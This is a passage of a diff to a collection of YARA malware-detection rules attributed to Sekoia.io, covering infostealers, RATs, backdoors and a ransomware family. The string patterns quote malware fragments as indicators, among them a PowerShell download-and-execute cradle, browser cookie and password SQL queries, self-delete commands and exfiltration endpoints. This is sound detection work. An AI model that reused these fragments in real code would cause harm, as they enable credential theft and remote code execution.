-		$op1 = {B8 C8 00 00 00 83 FB 01 44 0F 47 E8 41 8B C5 48 8B B4 24 E0 18 00 00 4C 8B A4 24 E8 18 00 00 48 8B 8D A0 17 00 00 48 33 CC}
-		$op2 = {33 D2 46 8D 04 B5 00 00 00 00 66 0F 1F 44 00 00 49 63 C0 41 FF C0 8B 4C 84 70 31 4C 94 40 48 FF C2}
-		$op3 = {89 5C 24 50 0F 57 C0 C7 44 24 4C 04 00 00 00 C7 44 24 48 40 00 00 00 0F 11 44 24 60 0F 11 44 24 70 0F 11 45 80 0F 11 45 90}
+		$ = "Private Function decodeHex(hex)"
+		$ = "Dim serialized_obj"
+		$ = "decodeHex = EL.NodeTypedValue"
+		$ = "d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and ( filesize < 500KB and ( 1 of ( $x* ) or 2 of them ) or ( $x1 and 1 of ( $s* ) or 3 of them ) )
+		all of them and filesize < 2MB
 }
-rule SEKOIA_Rat_Win_Xworm_V2 : FILE
+rule SEKOIA_Apt_Muddywater_Manifestation_Backdoor : FILE
 {
 	meta:
-		description = "Finds XWorm v2 samples based on characteristic strings"
+		description = "Detects Muddys manifestation JScript backdoor"
 		author = "Sekoia.io"
-		id = "6cf06f52-0337-415d-8f29-f63d67e228f8"
-		date = "2022-11-07"
+		id = "998fb0ab-73ed-41e5-b87e-f987b8f05a8c"
+		date = "2022-01-13"
 		modified = "2024-12-19"
-		reference = "https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_xworm_v2.yar#L1-L38"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_muddywater_manifestation_backdoor.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "58a2dbfbd453855021942902a6d55d150eee3acba67a294da24448cfca4f811e"
+		logic_hash = "477ed53ccd337dd21ab84b7d36b995a653d0aad6676e02cbe5e9f581bface253"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "XWorm.exe" wide ascii
-		$str02 = "ngrok" wide ascii
-		$str03 = "Mutexx" ascii
-		$str04 = "FileManagerSplitFileManagerSplit" wide
-		$str05 = "InstallngC" wide
-		$str06 = "downloadedfile" wide
-		$str07 = "creatfile" wide
-		$str08 = "creatnewfolder" wide
-		$str09 = "showfolderfile" wide
-		$str10 = "hidefolderfile" wide
-		$str11 = "txtttt" wide
-		$str12 = "\\root\\SecurityCenter2" wide
-		$str13 = "[USB]" wide
-		$str14 = "[Drive]" wide
-		$str15 = "[Folder]" wide
-		$str16 = "HVNC" wide
-		$str17 = "http://exmple.com/Uploader.php" wide
-		$str18 = "XKlog.txt" wide
-		$str19 = "Select * from AntivirusProduct" wide
-		$str20 = "runnnnnn" wide
-		$str21 = "RunBotKiller" wide
-		$str22 = "bypss" wide
-		$str23 = "<Xwormmm>" wide
+		$s1 = "/^\\s+|\\s+$/g" ascii
+		$l2 = "while (1) {" ascii
+		$l3 = { 57 53 63 72 69 70 74 2e 73 6c 65 65 70 28 ?? ?? 20 2a 20 31 30 30 30 29 3b }
+		$s4 = ")+ key , false)" ascii
+		$s5 = ")+ data , false)" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 12 of them
+		filesize > 1000 and ( $l3 in ( @l2 .. @l2 + 300 ) ) and ( any of ( $s* ) )
 }
-rule SEKOIA_Apt_Cottonsandstorm_Win_Implant : FILE
+rule SEKOIA_Infostealer_Win_Leaf : FILE
 {
 	meta:
-		description = "Detects a simple win implant used by Cotton Sandstorm"
+		description = "Find samples of Leaf Stealer based on specific strings"
 		author = "Sekoia.io"
-		id = "04a5255c-f9bb-4612-b0e2-ed0326867055"
-		date = "2024-11-05"
+		id = "17d8e384-1092-4f27-b4f7-c0c0f7efcaa3"
+		date = "2023-02-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_cottonsandstorm_win_implant.yar#L1-L24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_leaf.yar#L1-L32"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "f797d71ed07d6e05556300e4ce0f2927"
-		logic_hash = "dcb25ee236ca52f23cc6bfdbcedcbc6d407e88f06341e684f202a59954733ade"
+		logic_hash = "f8c0ff694c9f7a02613000d85a40f6b400dcca60711e589f7ccd3546f571aea6"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -251009,57 +250932,66 @@ rule SEKOIA_Apt_Cottonsandstorm_Win_Implant : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "DIR =>" wide
-		$ = "type=machines&md5=" wide
-		$ = "File =>" wide
-		$ = "&ip=" wide fullword
-		$ = "&un=" wide fullword
-		$ = "&cp=" wide fullword
-		$ = "myFile\";filename=" ascii
-		$ = "ifB75BcjsRBhy2et" ascii
+		$str01 = "Leaf $tealer" ascii
+		$str02 = "KiwiFolder" ascii
+		$str03 = "key_wordsFiles" ascii
+		$str04 = "**[Click to copy](https://superfurrycdn.nl/copy/" ascii
+		$str05 = "Early_Verified_Bot_Developer" ascii
+		$str06 = "getCookie.<locals>.<genexpr>" ascii
+		$str07 = "C:\\Program Files (x86)\\Steam\\config" ascii
+		$str08 = "[crunchyroll](https://crunchyroll.com)" ascii
+		$str09 = "-m pip install" ascii
+		$str10 = "taskkill /im " ascii
+		$str11 = "/loginusers.vdf" ascii
+		$str12 = "mot_de_passe" ascii
+		$str13 = "Interesting files found on user PC" ascii
+		$str14 = "NationsGlory/Local Storage/leveldb" ascii
+		$str15 = "wppassw.txt" ascii
+		$str16 = "wpcook.txt" ascii
+		$str17 = "ProcesName < 1 >" ascii
+		$str18 = "Metamask_" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 4 of them and filesize < 500KB
+		uint16( 0 ) == 0x5A4D and 10 of them
 }
-rule SEKOIA_Crime_Sload_Vbs_Wsf_Downloader : FILE
+rule SEKOIA_Rat_Win_Lilith
 {
 	meta:
-		description = "Detects sLoad Downloader"
+		description = "Detect the Lilith malware"
 		author = "Sekoia.io"
-		id = "55d87205-5f8f-479a-a616-bf3fce571f03"
-		date = "2022-08-01"
+		id = "944637e6-c4e4-423f-9f4c-a26b4fce3729"
+		date = "2023-02-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/crime_sload_vbs_wsf_downloader.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_lilith.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "bd6a9112edb01544463aa7112432ad49360221e89a9ac15d5e8f6731b2b8780a"
+		logic_hash = "ac2ad9e68616e6e7d07e105293545c96b72c956dbcf3c3bf317460cafc13be48"
 		score = 75
 		quality = 76
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = { 53 65 74 20 6c 69 6e 6b 20 3d 20 [5-10] 2e 43 72 65 61 74 65 53 68 6f 72 74 63 75 74 28 }
-		$ = { 2e 72 75 6e 20 22 63 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 44 6f 63 75 6d 65 6e 74 73 5c [5-10] 2e 6c 6e 6b 20 2f 63 20 70 6f 77 65 72 73 68 65 6c 6c }
-		$ = { 3d 22 20 2f 63 20 70 6f 77 65 72 73 68 65 6c 6c 20 22 }
-		$ = { 20 2f 63 20 70 6f 77 65 72 73 68 65 6c 6c 20 22 20 26 20 }
+		$ = {55 6d 56 6e 55 58 56 6c 63 6e 6c 57 59 57 78 31 5a 55 56 34 51 51 3d 3d}
+		$ = {67 65 74 61 64 64 72 69 6e 66 6f 3a 20 25 73}
 
 	condition:
-		2 of them and filesize < 1KB
+		all of them
 }
-rule SEKOIA_Infostealer_Win_Stealc_Str_Oct24 : FILE
+rule SEKOIA_Infostealer_Win_Bebra : FILE
 {
 	meta:
-		description = "Finds Stealc standalone samples (or dumps) based on the strings"
+		description = "Find samples of Bebra Stealer based on specific strings"
 		author = "Sekoia.io"
-		id = "7448fafe-206c-4f9c-b5a3-cbabec12a45b"
-		date = "2024-10-20"
+		id = "e84d04a7-1232-47e5-b797-ac8e56066796"
+		date = "2023-02-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_stealc_str_oct24.yar#L1-L27"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_bebra.yar#L1-L26"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "4f7fece81c3fe1e56b57aed4030b48331b53443a200799046fe84c895b591a71"
+		hash = "7841746c54c53dbcafdf3f357c7a84b90fe3b089e07f30dea15ef6f7f15b0f00"
+		logic_hash = "588fa3091f0dc565123c60d59479202d036e092499eca6204d420395ddc332f9"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -251067,94 +250999,105 @@ rule SEKOIA_Infostealer_Win_Stealc_Str_Oct24 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "-nop -c \"iex(New-Object Net.WebClient).DownloadString(" ascii
-		$str02 = "Azure\\.IdentityService" ascii
-		$str03 = "steam_tokens.txt" ascii
-		$str04 = "\"encrypted_key\":\"" ascii
-		$str05 = "prefs.js" ascii
-		$str06 = "browser: FileZilla" ascii
-		$str07 = "profile: null" ascii
-		$str08 = "url:" ascii
-		$str09 = "login:" ascii
-		$str10 = "password:" ascii
-		$str11 = "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" ascii
-		$str12 = "ChromeFuckNewCookies" ascii
-		$str13 = "/c timeout /t 10 & del /f /q \"" ascii
+		$str01 = "https://studio.youtube.com/youtubei/v1/att/esr?alt=json&key=" ascii
+		$str02 = "https://www.youtube.com/getAccountSwitcher" ascii
+		$str03 = "\"challenge\":\"" ascii
+		$str04 = "\"botguardResponse\":\"" ascii
+		$str05 = "\"continueUrl\":\"https://studio.youtube.com/reauth\"," ascii
+		$str06 = "\"flow\":\"REAUTH_FLOW_YT_STUDIO_COLD_LOAD\"," ascii
+		$str07 = "\"xguardClientStatus\":0" ascii
+		$str08 = "SAPISIDHASH" ascii
+		$str09 = "system32\\cmd.exe /C choice /C Y /N /D Y /T 0 &Del" ascii
+		$str10 = "/new.php" ascii
+		$str11 = "github.com/mattn/go-sqlite3" ascii
 
 	condition:
 		uint16( 0 ) == 0x5A4D and 9 of them
 }
-rule SEKOIA_Apt_Uac0099_Lonepage : FILE
+rule SEKOIA_Clipper_Win_Cryptoclippy : FILE
 {
 	meta:
-		description = "Detects LonePage vbs malware"
+		description = "Finds CryptoClippy samples"
 		author = "Sekoia.io"
-		id = "007f62f5-da5c-4df7-8b5c-5ed815ce6993"
-		date = "2024-01-08"
+		id = "eaa98a8e-e29e-43a4-8b2d-2137d33d4116"
+		date = "2023-04-11"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_uac0099_lonepage.yar#L1-L30"
+		reference = "https://unit42.paloaltonetworks.com/crypto-clipper-targets-portuguese-speakers/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/clipper_win_cryptoclippy.yar#L1-L25"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "479f438acb63c76e09722640b973e76d1f1924bf24db477ca6898d123091d5f8"
+		logic_hash = "057cb5bb957c2338a50c05cfa0177f75bcf263281ddcc5f365298bccafc64cb4"
 		score = 75
-		quality = 76
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s0 = "dim r, c" ascii fullword
-		$s1 = "= createobject(\"WScript.Shell\")" ascii fullword
-		$s2 = "r.Run c, 0, false" ascii fullword
-		$t1 = "GetHostAddresses" ascii fullword nocase
-		$t2 = "upgrade.txt" ascii fullword nocase
-		$t3 = "net.webclient" ascii fullword nocase
-		$t4 = "downloaddata" ascii fullword nocase
-		$t5 = "[System.Environment]::NewLine" ascii fullword nocase
-		$t6 = ".uploaddata('" ascii nocase
+		$str01 = "C:\\mbedtls\\library\\" ascii
+		$str02 = "udp://8.8.8.8:53" ascii
+		$str03 = "Upgrade: websocket" ascii
+		$str04 = "%s\\%s.lnk" ascii
+		$str05 = "%s\\%s.ps1" ascii
+		$str06 = "%s\\%s.bat" ascii
+		$str07 = "set PSExecutionPolicyPreference=Unrestricted" ascii
+		$str08 = "schtasks /delete /tn \"%ls\" /f" ascii
+		$str09 = "SetClipboardData" ascii
+		$str10 = "SetWinEventHook" ascii
 
 	condition:
-		true and filesize < 10KB and ( ( $s1 at 0x10 and $s0 at 0 and $s2 and 2 of ( $t* ) ) or ( all of ( $t* ) and any of ( $s* ) ) )
+		uint16( 0 ) == 0x5A4D and 8 of them
 }
-rule SEKOIA_Generic_Sharpshooter_Payload_1 : FILE
+rule SEKOIA_Backdoor_Win_Warhawk
 {
 	meta:
-		description = "Detects payload created by SharpShooter"
+		description = "Detect the WarHawk backdoor used by the SideWinder intrusion-set"
 		author = "Sekoia.io"
-		id = "82fd284a-47c2-4d29-9c80-f3affaa61a13"
-		date = "2023-02-03"
+		id = "d0ec19a7-cb08-4bca-b153-d7b0358186b4"
+		date = "2022-10-24"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_sharpshooter_payload_1.yar#L1-L18"
+		reference = "https://www.zscaler.com/blogs/security-research/warhawk-new-backdoor-arsenal-sidewinder-apt-group-0"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_warhawk.yar#L1-L56"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "20e42042bd03bde3d0eec42f81d560896e8ec9e67ad64611dc4bc21152db3ff0"
+		logic_hash = "09cd60f91c54da6ca051550c89629d11a55a89d5b0d5f6d5696232b4edfdd491"
 		score = 75
-		quality = 80
-		tags = "FILE"
+		quality = 58
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash_exe1 = "7d3574c62df44b74337fc74ec7877792b4ffa1486a49bb19668433c3ca8836b5"
+		hash_exe2 = "624c6b56ee3865f4a5792ad1946a8e86b876440a5af3bac22ac1dee92f1b7372"
+		hash_iso1 = "58b3686e4255d32dbcf7dee9dac1d5be6d4692d086cde167da1e1a5e0e1b315a"
+		hash_iso2 = "f97d5d3e1c2ceb3e9d23ae5b5d4e7c9857155df5acf7f67fee995cb041c797dc"
 
 	strings:
-		$ = "rc4 = function(key, str)"
-		$ = "var e={},i,b=0,c,x,l=0,a,r="
-		$ = "var plain = rc4("
-		$ = "<script language="
+		$ = {7b205c226e616d655c223a205c2225735c222c205c2273697a655c223a205c225c222c205c226d6f645c223a205c2225735c222c205c22747970655c223a205c2246696c6520666f6c6465725c22207d2c}
+		$ = {7b20225f68776964223a20222573222c20225f636f6d7075746572223a20222573222c20225f757365726e616d65223a20222573222c20225f6f73223a2022257322207d}
+		$ = {7b5c226e616d655c223a205c2225735c222c205c22747970655c223a205c2225735c227d2c}
+		$ = {7b20225f68776964223a20222573222c20225f66696c656d67725f646f6e65223a202274727565222c20225f726573706f6e7365223a2022257322207d}
+		$ = {7b20225f68776964223a20222573222c20225f7461736b223a20227472756522207d}
+		$ = {7b20225f68776964223a20222573222c20225f7461736b5f646f6e65223a202274727565222c20225f6964223a2022257322207d}
+		$ = {7b20225f68776964223a20222573222c20225f636d64223a20227472756522207d}
+		$ = {7b20225f68776964223a20222573222c20225f636d645f646f6e65223a202274727565222c20225f726573706f6e7365223a2022257322207d}
+		$ = {7b20225f68776964223a20222573222c20225f66696c656d6772223a20227472756522207d}
+		$ = {7b20225f68776964223a2022257322207d}
+		$ = {7b20225f68776964223a20222573222c20225f70696e67223a20227472756522207d}
+		$ = "cmd.exe"
 
 	condition:
-		all of them and filesize < 2MB
+		all of them
 }
-rule SEKOIA_Infostealer_Win_Stormkitty_Exfil_Urls : FILE
+rule SEKOIA_Loader_Amadey_Clipper_Plugin : FILE
 {
 	meta:
-		description = "Detect the open-source StormKitty spyware by looking for the github path"
+		description = "Finds Amadey's clipper plugin based on characteristic strings"
 		author = "Sekoia.io"
-		id = "d3b6e778-85da-4ab6-bc98-921897677485"
-		date = "2022-04-20"
+		id = "487b6657-8834-45ee-8fd4-03df9c0dd7be"
+		date = "2023-05-16"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_stormkitty_exfil_urls.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_amadey_clipper_plugin.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "ccf0efe9ccba8e37bc19fa241e2d7698b1a798a3e8026b1b6930452b8a8ba9b4"
+		logic_hash = "6f5a2fa9c687f0fb2423ca97540d0173551dd04b31d092e4d47d6d7d22dfb965"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -251162,56 +251105,57 @@ rule SEKOIA_Infostealer_Win_Stormkitty_Exfil_Urls : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "https://github.com/LimerBoy/StormKitty" ascii
-		$telegram = "https://api.telegram.org" wide
-		$discord = "https://cdn.discordapp.com" wide
+		$str01 = "CLIPPERDLL.dll" ascii
+		$str02 = "??4CClipperDLL@@QAEAAV0@$$QAV0@@Z" ascii
+		$str03 = "??4CClipperDLL@@QAEAAV0@ABV0@@Z" ascii
+		$str04 = "Main" ascii fullword
+		$str05 = "OpenClipboard" ascii
+		$str06 = "GetClipboardData" ascii
+		$str07 = "D:\\Mktmp\\Amadey\\ClipperDLL\\Release\\CLIPPERDLL.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them and ( #telegram > 3 or #discord > 3 )
+		uint16( 0 ) == 0x5A4D and 5 of them
 }
-rule SEKOIA_Ransomware_Win_Dodo_2023 : FILE
+rule SEKOIA_Infostealer_Win_Ginzostealer_Str : FILE
 {
 	meta:
-		description = "Rule to detect Dodo ransomware samples."
+		description = "Finds samples of the Ginzo Stealer"
 		author = "Sekoia.io"
-		id = "190977d4-5a7a-4e15-8f90-085f82ec56c8"
-		date = "2023-02-13"
+		id = "ef87e94b-9c53-44b4-b8a1-87d371a6d2cb"
+		date = "2022-04-21"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_dodo_2023.yar#L1-L22"
+		reference = "https://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_ginzostealer_str.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "01924360ef4bbecd220439290eba22838a3977793fdebd0ef0be74c342c0d152"
+		logic_hash = "b1c811a13cf0f632ac839b6a6de050fc59ffe3ed0704545feff02e13521ea53f"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "aee45cc2540d49a28e765c30f1c4d0b853c1a74ea2260bd7614ece8e54c3bcb3"
 
 	strings:
-		$s1 = "DODOCRYPTER" ascii wide
-		$s2 = "dodov2" ascii wide
-		$s3 = "dodov2SPREAD.exe" ascii wide
-		$s4 = "dodov2_readit.txt" ascii wide
-		$s5 = "WELCOME, DODO has returned" ascii wide
-		$s6 = "Monero Address: 442n8nf9zojie1JdkZqxDQJFDumBEgZmVZozLdYd5jVPSMws2oUPvNLJKca6JKojyA7zDCZCnMyYnKbY1JLNsbzWK6HNNqW" ascii wide
-		$s7 = "The price for the software is $15. Payment can be made in Bitcoin or XMR." ascii wide
+		$str0 = "Ginzo.pdb" ascii
+		$str1 = "Ginzo.exe" wide
+		$str2 = "SELECT creation_utc,top_frame_site_key,host_key,name,value,encrypted_value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,samesite,source_scheme,source_port,is_same_party FROM cookies" wide
+		$str3 = "SELECT origin_url,action_url,username_element,username_value,password_element,password_value,submit_element,signon_realm,date_created,blacklisted_by_user,scheme,password_type,times_used,form_data,display_name,icon_url,federation_url,skip_zero_click,generation_upload_status,possible_username_pairs,id,date_last_used,moving_blocked_for,date_password_modified FROM logins" wide
+		$str4 = "SELECT id,originAttributes,name,value,host,path,expiry,lastAccessed,creationTime,isSecure,isHttpOnly,inBrowserElement,sameSite,rawSameSite,schemeMap FROM moz_cookies" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 4 of them
+		uint16( 0 ) == 0x5A4D and 4 of them
 }
-rule SEKOIA_Apt_Gamaredon_Ddrdoh_Vbs_Downloader : FILE
+rule SEKOIA_Tool_Godpotato : FILE
 {
 	meta:
-		description = "Detects the core of the VBS Gamaredon's Telegram Downloader"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "c934b95d-d81d-4f58-a752-1bb31ba8593d"
-		date = "2023-01-25"
+		id = "cc396771-f187-43ae-903f-147d15483c46"
+		date = "2023-08-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_ddrdoh_vbs_downloader.yar#L1-L26"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_godpotato.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "940635313b23e29ac98310fc0f20352405c96190d56cd36ef028bf4d6e77fa6b"
+		logic_hash = "ea182b187fcd1ba61d3e2d10a689cf0212267dede1342e817e47551506a780ab"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -251219,34 +251163,29 @@ rule SEKOIA_Apt_Gamaredon_Ddrdoh_Vbs_Downloader : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$a1 = "==([0-9\\@]+)==" ascii
-		$a2 = "data\"\":\"\"(.*?)" ascii
-		$a3 = ", vbcr ,\"\")" ascii
-		$a4 = ", vblf ,\"\")" ascii
-		$a5 = ", \"&&\" ,\"\")" ascii
-		$a6 = "ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4" ascii
-		$b1 = "==([0-9\\@]+)==" base64
-		$b2 = "data\"\":\"\"(.*?)" base64
-		$b3 = ", vbcr ,\"\")" base64
-		$b4 = ", vblf ,\"\")" base64
-		$b5 = ", \"&&\" ,\"\")" base64
-		$b6 = "ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4" base64
+		$s1 = "[!] Cannot create process Win32Error:{0}" ascii wide
+		$s2 = "[*] process start with pid {0}" ascii wide
+		$s3 = "MEOW" ascii wide
+		$s4 = "2ae886c3-3272-40be-8d3c-ebaede9e61e1" ascii wide
+		$s5 = "GodPotatoUnmarshalTrigger" ascii wide
+		$s6 = "GodPotato.exe" ascii wide
+		$s7 = "GodPotato.exe" wide
 
 	condition:
-		(4 of ( $a* ) or 4 of ( $b* ) ) and filesize < 50KB
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 4MB and all of them
 }
-rule SEKOIA_Ursnif : FILE
+rule SEKOIA_Bot_Lin_Lucifer_Strings : FILE
 {
 	meta:
-		description = "Ursnif Payload"
+		description = "Catch Lucifer DDoS - lin version - malware based on strings"
 		author = "Sekoia.io"
-		id = "ac392af3-c344-453c-9427-5bb46223e01c"
-		date = "2024-12-19"
+		id = "c341b6d0-bc22-4a85-aebb-ed323487f524"
+		date = "2024-09-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ursnif.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/bot_lin_lucifer_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "fd3c3be5ede0a980b44560cfb9b8c4c1ee322091fa86bc9143f30dc900053c2b"
+		logic_hash = "23276c627d27f36c1ec15b1779835b921652a8fcff898041f1920902262faf41"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -251254,30 +251193,28 @@ rule SEKOIA_Ursnif : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$crypto64_1 = {41 8B 02 ?? C1 [0-1] 41 33 C3 45 8B 1A 41 33 C0 D3 C8 41 89 02 49 83 C2 04 83 C2 FF 75 D?}
-		$crypto64_2 = {44 01 44 24 10 FF C1 41 8B C0 D1 64 24 10 33 C3 41 8B D8 FF 4C 24 10 41 33 C3 01 44 24 10 D3 C8 01 44 24 10 41 89 02 49 83 C2 04 83 C2 FF 75 C3}
-		$crypto64_3 = {33 C6 ?? C7 [0-1] 49 83 C2 04 33 C3 8B F1 8B CF D3 C8 89 02 48 83 C2 04 41 83 C3 FF 75 ?? 45 85 C9 75 ?? 41 83 E0 03}
-		$crypto64_4 = {41 8B 02 41 8B CB 41 83 F3 01 33 C3 41 8B 1A C1 E1 03 41 33 C0 D3 C8 41 89 02 49 83 C2 04 83 C2 FF 75 C6}
-		$decrypt_config64 = {44 8B D9 33 C0 45 33 C9 44 33 1D ?? ?? ?? 00 ?? ?? D2 ?? ?? D2 74 ?? 4C 8D 42 10 45 3B 0A 73 2? 45 39 58 F8 75 1C 41 F6 40 FC 01 74 12}
-		$crypto32_1 = {01 45 FC D1 65 FC FF 4D FC 33 C1 33 45 0C 01 45 FC 43 8A CB D3 C8 8B CE 01 45 FC 89 02 83 C2 04 FF 4D 08 75 CD}
-		$crypto32_2 = {33 C1 33 44 24 10 43 8A CB D3 C8 8B CE 89 02 83 C2 04 FF 4C 24 0C 75 D9}
-		$decrypt_config32 = {8B ?? 08 5? 33 F? 3B [1-2] 74 14 A1 0? ?? ?? ?? 35 ?? ?? ?? ?? 50 8B D? E8 ?? D? 00 00 EB 02 33 C0 ?B ?? ?? ?? ?? ?? ?? ?? 74 14 8D 4D ?? ?? ?? 50 FF D? 85 C0 74 08}
+		$s1 = "DealwithDDoS" ascii
+		$s2 = "DecryptData" ascii
+		$s3 = "They say I'm rude. I'm not rude at all, but I still want to say, fuck your mother" ascii
+		$s4 = "stratum+tcp://" ascii
+		$s5 = "gethostip" ascii
+		$s6 = "GetmyName" ascii
 
 	condition:
-		true and uint16( 0 ) == 0x5A4D and ( ( $decrypt_config64 and any of ( $crypto64* ) ) or ( $decrypt_config32 and any of ( $crypto32* ) ) )
+		uint32( 0 ) == 0x464c457f and all of them
 }
-rule SEKOIA_Apt_Mustangpanda_Downloader : FILE
+rule SEKOIA_Crime_Sload_Mainpowershellimplant : FILE
 {
 	meta:
-		description = "Detects the MustangPanda Downloader"
+		description = "Detects the main PowerShell implant"
 		author = "Sekoia.io"
-		id = "54850ffd-f93b-4082-b3ca-8e1d60b35422"
-		date = "2022-03-02"
+		id = "09d268e7-d688-4390-856e-9e9ed47aec04"
+		date = "2022-08-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustangpanda_downloader.yar#L1-L19"
